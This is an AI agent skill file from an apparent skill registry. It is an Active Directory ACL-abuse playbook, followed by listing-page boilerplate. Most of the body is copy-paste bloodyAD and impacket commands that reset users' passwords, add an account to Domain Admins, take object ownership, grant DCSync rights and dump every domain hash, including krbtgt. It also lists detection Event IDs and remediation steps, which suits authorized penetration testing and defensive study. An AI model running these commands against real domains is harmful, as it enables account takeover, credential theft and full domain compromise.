--- name: acl-abuse description: Abusing Active Directory object ACLs (DACL/ownership) for privilege escalation and lateral movement (GenericAll, GenericWrite, WriteDACL, WriteOwner, AddMember, ForceChangePassword, and replication rights via DS-Replication-Get-Changes-All). Use when BloodHound CE shows an outbound control edge from a principal you own toward a higher-value object, and you want the exact bloodyAD/impacket command to weaponize that ACE, plus detection and remediation. DCSync is covered here strictly as a post-compromise technique, not a user entry path. ---
# ACL Abuse
Active Directory permissions are a graph. A single misconfigured Access Control Entry (ACE), say a low-priv user with `GenericAll` over a group, `WriteDacl` over a computer, or `WriteOwner` over an OU, is a directed edge you can walk from where you are toward Domain Admin. This skill turns those edges into concrete commands with **bloodyAD** and **impacket**, after **BloodHound CE** (Apache-2.0, genuinely open source) has drawn the path.
**Find the paths first (BloodHound CE).** Collect with a standard collector, import into BloodHound CE, and look at the outbound control edges from your owned principal: `GenericAll`, `GenericWrite`, `WriteDacl`, `Owns`/`WriteOwner`, `AddMember`, `ForceChangePassword`, `AllExtendedRights`, and `DCSync`. Pre-built queries like "Shortest paths from Owned principals" and "Find principals with DCSync rights" hand you the chain.
Collect edges with a standard collector, for example: ``` nxc ldap 10.0.0.10 -u user -p 'Password123' --bloodhound --collection All --dns-server 10.0.0.10 ``` or run `rusthound-ce` / SharpHound CE and import the ZIP into BloodHound CE.
---
## GenericAll
**MITRE ATT&CK:** T1222 (Permission Modification) / T1098 (Account Manipulation)
**What it is.** Full control over the target object. What you do with it depends on the target type: - **Over a user:** reset their password (ForceChangePassword) or set an SPN and Kerberoast them (targeted roasting), or set `DONT_REQ_PREAUTH` and AS-REP roast. - **Over a group:** add yourself as a member (AddMember). - **Over a computer:** write RBCD (`msDS-AllowedToActOnBehalfOfOtherIdentity`) and impersonate (see the Kerberos skill).
Reset a user's password: ``` bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \ set password TARGETUSER 'NewPass123!' ```
Add yourself to a group: ``` bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \ add groupMember 'Domain Admins' owneduser ```
Targeted Kerberoast (set an SPN you control, then roast, see Kerberos skill): ``` bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \ set object TARGETUSER servicePrincipalName -v 'fake/svc' GetUserSPNs.py -request-user TARGETUSER -dc-ip 10.0.0.10 CORP.LOCAL/owneduser:'Password123' ```
---
## GenericWrite
**MITRE ATT&CK:** T1098
**What it is.** Write non-protected attributes on the target. Enough to set an SPN (targeted Kerberoast), set `DONT_REQ_PREAUTH` (targeted AS-REP roast), or write `msDS-AllowedToActOnBehalfOfOtherIdentity` on a computer (RBCD). Not enough to reset the password directly on a user (that is ForceChangePassword / GenericAll).
Set the preauth-disabled flag for a targeted AS-REP roast: ``` bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \ add uac TARGETUSER -f DONT_REQ_PREAUTH GetNPUsers.py -dc-ip 10.0.0.10 -request CORP.LOCAL/owneduser:'Password123' ```
Write RBCD on a computer you can then S4U through: ``` bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \ add rbcd TARGET$ EVIL$ ```
---
## ForceChangePassword
**MITRE ATT&CK:** T1098
**What it is.** The `User-Force-Change-Password` extended right lets you reset the target user's password without knowing the old one. Straight account takeover of that user.
``` bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \ set password TARGETUSER 'NewPass123!' ``` impacket alternative: ``` net rpc password TARGETUSER 'NewPass123!' -U 'CORP.LOCAL/owneduser%Password123' -S 10.0.0.10 ```
**Note:** resetting an in-use account is noisy and disruptive; it locks the real user out. Prefer targeted Kerberoast/AS-REP where the edge allows, and coordinate password resets with the client.
---
## AddMember
**MITRE ATT&CK:** T1098
**What it is.** Write access to a group's `member` attribute. Add a principal you control to a privileged group (a nested group that eventually reaches Domain Admins is just as good).
``` bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \ add groupMember 'Backup Operators' owneduser ```
---
## WriteDACL
**MITRE ATT&CK:** T1222.001 (Windows Permission Modification)
**What it is.** You can rewrite the target's DACL, so you grant *yourself* whatever ACE you want (up to full control) and then exploit that. The common escalation is to grant yourself the replication rights on the domain object (setting up DCSync, see below) or GenericAll on a user/group.
Grant yourself an ACE on the target (impacket dacledit): ``` dacledit.py -action write -rights FullControl -principal owneduser \ -target-dn 'CN=TargetUser,CN=Users,DC=corp,DC=local' \ -dc-ip 10.0.0.10 CORP.LOCAL/owneduser:'Password123' ```
bloodyAD equivalent (grant a right on an object): ``` bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \ add genericAll 'CN=TargetUser,CN=Users,DC=corp,DC=local' owneduser ```
---
## WriteOwner / Owns
**MITRE ATT&CK:** T1222.001
**What it is.** You can set yourself as the *owner* of the target object. The owner can always rewrite the DACL, so WriteOwner chains into WriteDACL into full control. Two steps: take ownership, then grant yourself rights.
Take ownership (impacket owneredit): ``` owneredit.py -action write -new-owner owneduser \ -target-dn 'CN=TargetUser,CN=Users,DC=corp,DC=local' \ -dc-ip 10.0.0.10 CORP.LOCAL/owneduser:'Password123' ``` Then grant yourself full control with dacledit (as above), then exploit as GenericAll.
bloodyAD one-liner for ownership: ``` bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \ set owner 'CN=TargetUser,CN=Users,DC=corp,DC=local' owneduser ```
---
## Replication rights → DCSync (POST-COMPROMISE ONLY)
**MITRE ATT&CK:** T1003.006 (OS Credential Dumping: DCSync)
**Frame this correctly.** DCSync is **not a user entry path**. It is a post-compromise credential-extraction technique performed by a principal that *already holds* the directory replication extended rights, `DS-Replication-Get-Changes` and `DS-Replication-Get-Changes-All`, on the domain object. In a healthy domain those rights belong only to Domain Controllers and to Domain/Enterprise Admins, so being able to DCSync normally means you are already Domain Admin (or the equivalent). It matters to ACL abuse only in one specific case: **a non-DC, non-admin principal has been mis-granted those replication rights**, usually as the *result* of a WriteDACL/WriteOwner chain above. In that case DCSync is the payoff of the ACL abuse, still executed after you have obtained (or granted yourself) the replication rights, never before.
So the ACL entry point is the mis-granted right (or granting it to yourself via WriteDACL on the domain object); the DCSync itself is the follow-on.
Grant the replication rights (only if you have WriteDACL on the domain head, the abusable misconfiguration): ``` dacledit.py -action write -rights DCSync -principal owneduser \ -target-dn 'DC=corp,DC=local' -dc-ip 10.0.0.10 CORP.LOCAL/owneduser:'Password123' ```
Then, holding those rights, replicate secrets (impacket secretsdump): ``` secretsdump.py -just-dc-user 'CORP\krbtgt' CORP.LOCAL/owneduser:'Password123'@10.0.0.10 secretsdump.py -just-dc CORP.LOCAL/owneduser:'Password123'@10.0.0.10 # full dump ``` netexec equivalent: ``` nxc smb 10.0.0.10 -u owneduser -p 'Password123' --ntds ```
Dumping `krbtgt` enables Golden Tickets; dumping the Administrator hash enables pass-the-hash. Both are post-DA persistence, not entry.
---
## Detection (Event IDs)
- **5136**: a directory object was modified. This is the central ACL-abuse event: it fires on DACL changes, group membership changes, SPN writes, `userAccountControl` flips, RBCD writes, and owner changes. Watch the `AttributeLDAPDisplayName` (e.g. `nTSecurityDescriptor`, `member`, `servicePrincipalName`, `msDS-AllowedToActOnBehalfOfOtherIdentity`). - **5137/5139/5141**: object created/moved/deleted, for the surrounding activity. - **4662**: an operation was performed on an object. For DCSync, look for 4662 with the replication control access GUIDs `1131f6aa-9c07-11d1-f79f-00c04fc2dcd2` (Get-Changes) and `1131f6ad-9c07-11d1-f79f-00c04fc2dcd2` (Get-Changes-All) requested by a principal that is **not** a Domain Controller, which is the tell that a non-DC is replicating. - **4738**: a user account was changed (attribute-level). - **4728/4732/4756**: a member was added to a security-enabled group. - Microsoft Defender for Identity raises "Suspected DCSync attack" on replication from a non-DC.
---
## Remediation to write up
- **Audit ACEs.** Enumerate non-default ACEs across users, groups, computers, OUs and the domain head. Any GenericAll/GenericWrite/WriteDacl/WriteOwner held by a non-Tier-0 principal over a privileged object is a finding. - **Strip replication rights from everything that is not a DC.** Only Domain Controllers and the intended Tier-0 admins should hold `DS-Replication-Get-Changes-All`. Remove it from every user/group/service account that has it. - **Protect the domain head DACL.** `WriteDacl`/`WriteOwner` on `DC=corp,DC=local` is game over; lock it to Tier-0. - **Set `MachineAccountQuota` to 0** to kill the RBCD-via-new-computer variant. - Alert on 5136 changes to security descriptors and to `member` on privileged groups; alert on 4662 replication access from non-DCs. - Use tiered administration so the graph has no low-priv-to-Tier-0 edges in the first place.
Only exploit ACLs on systems you are authorized to test. Password resets are disruptive; coordinate. Use lab/generic DNs and names in write-ups.
---
## Reference
- DACL abuse (GenericAll/GenericWrite/WriteDacl/WriteOwner/AddMember): https://www.thehacker.recipes/ad/movement/dacl/ - Targeted Kerberoasting: https://www.thehacker.recipes/ad/movement/kerberos/roasting/kerberoast - DCSync: https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync
Source provenance
Decision snapshot
recent repository activity
Audit
Install and adoption review
Agent-proven evidence
Outcome reports after resolve, review, install, and one narrow run.
No agent outcome data yet. The first agent run can report success, setup needs, risk blocks, failure, or not-relevant through /api/agent/outcome.
Install
Free and open source. Review the report before installing into production agents.
Growth loop
Scenario-led draft for acl-abuse, ready for a manual X post.
A practical pick for a repeatable workflow: acl-abuse: Abusing Active Directory object ACLs (DACL/ownership) for privilege escalation and lateral movement (GenericAll, GenericWri... 153 stars https://www.openagentskill.com/skills/adscanpro-acl-abuse?ref=x
Listing + install path for acl-abuse: https://www.openagentskill.com/skills/adscanpro-acl-abuse?ref=x Install: npx skills add ADScanPro/Claude-AD --skill acl-abuse
Listing source
This listing was indexed from public sources and is not marked official until a maintainer claim is approved.
Attribution links to the public repository or creator profile. Creators can claim the listing to update ownership signals.
Claim this skillOwner claim
This Registry indexed listing is attributed to ADScanPro but is not marked official yet. Claim it to add a verified owner signal and make future launch, install, and audit updates easier to trust.
Creator backlink kit
Show the canonical listing, current trust and audit signals, and real Agent-Proven evidence where developers evaluate the repository.
[](https://www.openagentskill.com/skills/adscanpro-acl-abuse?ref=github&utm_source=github&utm_medium=referral&utm_campaign=creator_badge)
[](https://www.openagentskill.com/skills/adscanpro-acl-abuse?ref=github&utm_source=github&utm_medium=referral&utm_campaign=creator_badge)
[](https://www.openagentskill.com/skills/adscanpro-acl-abuse/audit)
[](https://www.openagentskill.com/skills/adscanpro-acl-abuse?ref=github&utm_source=github&utm_medium=referral&utm_campaign=creator_badge)ADScanPro
@adscanpro
Share whether this skill looks useful for your agent workflow. Aggregated feedback improves rankings over time.
Sandbox only
stop-slop
Eliminates predictable AI writing patterns from prose while preserving specific meaning and reader trust.
16.3K StarsHumanizer
Rewrites AI-sounding text so it reads naturally while preserving every factual claim and matching the writer's voice.
37.4K Starsno-ai-slop
Audits or minimally edits drafts to remove named AI-writing patterns without flattening the author's voice.
5.8K Starsunslop
Applies Cursor's prose-discipline rules to remove filler and AI writing tells from agent-facing and user-facing text.
4.8K StarsPermission surface
secrets or environment access, shell or command execution
Agent outcomes
No agent outcome data yet
Docs
Strong README/SKILL.md context
Risk summary
Install readiness
Permission surface
secrets or environment access, shell or command execution
Agent outcomes
No agent outcome data yet
Docs
Strong README/SKILL.md context
Risk summary
Install readiness
Permission surface
secrets or environment access, shell or command execution
Agent outcomes
No agent outcome data yet
Docs
Strong README/SKILL.md context
Risk summary
Install readiness
Permission surface
secrets or environment access, shell or command execution
Agent outcomes
No agent outcome data yet
Docs
Strong README/SKILL.md context
Risk summary
Install readiness